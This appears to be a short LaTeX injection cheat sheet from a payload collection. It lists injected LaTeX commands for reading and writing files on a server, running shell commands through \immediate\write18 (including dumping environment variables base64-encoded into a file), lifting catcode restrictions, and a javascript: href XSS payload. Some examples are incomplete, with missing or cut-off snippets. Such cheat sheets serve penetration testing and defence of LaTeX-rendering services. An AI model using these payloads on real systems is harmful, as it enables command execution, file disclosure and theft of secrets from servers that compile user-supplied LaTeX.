LaTeX Injection

LaTex Injection #

Read file #

Read file and interpret the LaTeX code in it:

\include{somefile} # load .tex file (somefile.tex)

Read single lined file:

\read\file to\line

Read multiple lined file:

    \read\file to\fileline

Read text file, without interpreting the content, it will only paste raw file content:


If injection point is past document header (\usepackage cannot be used), some control characters can be deactivated in order to use \input on file containing $, #, _, &, null bytes, … (eg. perl scripts).

\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12

Write file #

Write single lined file:

\write\outfile{Line 2}
\write\outfile{I like trains}

Command execution #

The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.

\immediate\write18{id > output}

If you get any LaTex error, consider using base64 to get the result without bad characters (or use \verbatiminput):

\immediate\write18{env | base64 > test.tex}

Cross Site Scripting #

From @EdOverflow


Live example at$\href{javascript:alert(1)}{Frogs%20find%20bugs}$

References #